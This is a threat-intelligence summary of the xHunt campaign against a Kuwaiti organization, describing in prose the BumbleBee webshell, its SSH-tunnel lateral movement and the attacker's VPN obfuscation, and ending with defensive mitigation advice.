xHunt Campaign: New BumbleBee Webshell and SSH Tunnels Used for Lateral Movement


In September 2020, a detailed investigation into a prolonged xHunt campaign targeting a Kuwaiti organization revealed the presence of a newly discovered webshell named BumbleBee, alongside two other backdoors called TriFive and Snugy. The BumbleBee webshell was notable for its ability to upload/download files and execute commands on the compromised Microsoft Exchange server. The campaign demonstrated a sophisticated level of infiltration, suggesting a well-organized threat actor. The BumbleBee webshell required two passwords for access - one to view the webshell and another to interact with it. This two-step authentication process added an extra layer of security for the attacker, making it more challenging to detect unauthorized access. The webshell's color scheme (black, white, and yellow) inspired its name.

Analysis of the attacker's activities revealed a pattern of using Virtual Private Networks (VPNs) provided by Private Internet Access to obscure their true location. They frequently switched between VPN servers located in various countries, indicating a deliberate effort to obfuscate their origin. Additionally, the actor utilized different operating systems and browsers during interactions, further complicating analysis and attribution. The actor employed SSH tunnels to interact with BumbleBee webshells hosted on internal IIS web servers, enabling access to systems not directly accessible from the internet. These SSH tunnels were used for various purposes, including Remote Desktop Protocol (RDP) access and lateral movement within the network.

Commands executed via BumbleBee included network discovery, account enumeration, system time determination, SSH tunnel creation, RDP usage, lateral movement, and evidence deletion. These actions aligned with known MITRE ATT&CK techniques, indicating a deliberate strategy by the threat actor to achieve their objectives while evading detection.

Security Officer Comments:
Further analysis revealed the reuse of infrastructure across multiple targets, suggesting a consistent modus operandi by the actor. The actor's focus on concealing their location and monitoring for network awareness indicated a high level of sophistication and operational security. Tthe investigation shed light on the tactics, techniques, and procedures employed by the xHunt threat actor, highlighting the importance of robust cybersecurity measures to detect and mitigate such threats effectively.

Suggested Corrections:
Mitigating the threats posed by the xHunt campaign and similar sophisticated attacks requires a comprehensive and proactive approach to cybersecurity. This includes regular patch management to address known vulnerabilities, robust security awareness training to educate employees about common attack tactics, and the implementation of network segmentation to limit lateral movement within the network. Access controls should be enforced to restrict user permissions, while web application firewalls (WAF) and endpoint protection solutions can help detect and block malicious activity. Organizations should prioritize monitoring and logging to detect suspicious behavior, develop and test an incident response plan, and actively participate in threat intelligence sharing communities.